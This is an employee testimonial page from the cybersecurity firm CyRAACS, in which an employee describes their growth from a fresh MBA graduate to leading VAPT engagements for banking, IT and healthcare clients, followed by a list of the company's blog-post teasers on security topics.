I have learned over these years about my own domain, but there has also been a lot of cross-functional learning which has helped in overall growth in my career.

At CyRAACS, Individuals come in at different levels with different skill sets, expertise, aspirations, and attitudes. Here, at CyRAACS we learn to think independently, be focused, and push ourselves out of our comfort zone. This is a company that adds significant value to each employee, and it helps each individual reach her or his highest potential

I am proud and humbled to be amongst such incredibly talented people and I am thankful for the opportunity to contribute to our continued success.

What are your thoughts about the company’s vision and direction, and your role in helping CyRAACS achieve them?

Management at CyRAACS has always been transparent about what they are doing to achieve the company’s vision and has ensured that we are kept aware of the progress the company is making.

When I see my leaders working hard to live the standards of the vision, I feel equally motivated to do the same. I believe that we should be accountable for meeting our own goals and doing our part to achieve the company’s vision and direction.

I agree with the fact that transparency is great for the company's vision, but it is also a good way to build trust with employees and customers. Staying transparent about the failures and successes of the company will help your employees be more engaged and productive.

What advice would you give a job seeker who’s thinking about applying for a job with CyRAACS?

My advice to job seekers would be if you are looking for a challenging, fast-growing environment with opportunities to learn cross-functional skills, CyRAACS is a one-stop for you.

Specifically, for freshers, this is a great place to start their career because here you are mentored at every step to push yourself ad uncover your true professional.

The culture is transparent, every employee, irrespective of their position is given a chance to be heard, and there are ample opportunities available to those who want to build a career here

When you tell people about your job, what’s one thing that surprises them, or gets them excited about the work you do?

As the first job is considered as a most important point in anyone’s career path, CyRAACS proved to be the right tipping point for me. I joined as a fresh MBA graduate.

Early in my career, I was given a chance to handle a separate developing service line – Application security and I was trusted with the responsibility of handling stakeholders on my own. The whole experience has been a great learning opportunity for me.

My growth graph has been exponential as the management here has been very supportive and has given me ample learning opportunities with meaningful rewards and recognition.

Your achievements, Value provided to clients and Clients empathy etc

I have successfully completed 150+ projects with more than 50% repeat engagements.

Client achievement and empathy: I have received excellent recommendations from the majority of my clients highlighting the quality of deliverables, meeting up to the deadlines, and going beyond the set expectations from industry sector clients such as Banking industries, IT services, Healthcare, Telecommunications.

On request from one of our clients, a tax consulting multinational company wherein the client had to make their application go live, we were given a strict deadline to complete the said task. Conducting VAPT and helping a client secure their application was one of the major responsibilities which I abided to. The client was very happy with the engagement and in turn, suggested their internal departments conduct VAPT for their other applications.

Overnight audit requirement for one of our clients operating in small finance bank sectors was a crucial task to be completed.  A time constraint of 1 day was given to retest 10 applications. I took it as a challenge and had push myself to meet the said timelines and completed the task by leading my team. The client in return has extended their empanelment contract with us as their security partner.

Client-specific challenges wherein their application is inaccessible, or new functionality is introduced within the application, we have ensured that we accommodate such requests and perform multiple rounds of testing to make certain that all the functionalities of the application are tested, and the application is secure to go live on production. Clients have considered this as a key-value provided to them appreciating our extra efforts.

On request from one of our clients, an IT services company, we had to conduct VAPT for their application and Infrastructure components wherein they were given a strict government deadline to abide by. This request was taken into priority and I had to drive it to completion within the said timelines. A client gave positive feedback on the engagement and gave our referrals to other partner companies as a result.

Achievements and Certifications

Client success stories

Repeat clients – Our quality output and focussed approach has made CyRAACS an empanelled security partner for many of the client projects led by me across various industry sectors such as Finance, Banking, IT services, Healthcare, Telecommunications.

Referrals – Many of our clients have given referrals to their other partner companies for CyRAACS as a security vendor.

May 16, 2022
Why Security Architecture Review is important for Cyber Security?

Security Architecture Review is a holistic review of security that covers networks, Data, Applications, Endpoint, Cloud, etc.

Read More
March 10, 2021
Top 5 Benefits of Cloud Infrastructure Security 2021

Companies are realizing the benefits of cloud infrastructure. They are quicker to scale, cheaper to maintain, and more flexible.

Read More
February 10, 2021
Five Board Questions That Security and Risk Leaders Must Be Prepared To Answer

Executive leaders of organizations and board members are ultimately responsible for ensuring the long-term security

Read More
January 1, 2021
New Year 2021 Resolution for the CISO

With the year 2020 and the pandemic overwhelming us, we must be conscious of the increase in cyber security threats that are looming in front of us. Here are a few thoughts

Read More
December 10, 2020
Best Practices For Conducting Cybersecurity Audits In Crisis Situation

Global situations relating to the COVID-19 pandemic have impacted the business and has also impacted the work of auditors. The current situations challenge the conventional

Read More
November 10, 2020
Privilege Escalation by Exploiting WordPress Vulnerability

According to the statistics 73.2% of the most popular WordPress installations are vulnerable till date. These can be identified using automated tools and can be exploited.

Read More
October 10, 2020
Blockchain Implementation in Cyber Security and Cyber Forensics

Blockchain is an emerging technology that is quite popular nowadays due to the popularity of cryptocurrency. The blockchain contains a list of records or blocks which are linked using

Read More
September 10, 2020
Malvertisements

Malvertisements are a malicious advertisement distributed in the same was as a legitimate online advertisement. It is one of the common practices to use spread malware.

Read More
August 10, 2020
Employee Testimonial: Anamika Patil

CyRAACS is a great place to work because every day provides an opportunity to learn something new, to mentor and to be mentored to achieve our client’s goals.

Read More
CyRAACS-Logos-With-White-Text
Transform your business and manage risk with your trusted cyber security partner
[email protected]
+918553004777
Social
© COPYRIGHT 2022, ALL RIGHTS RESERVED
crossmenu linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram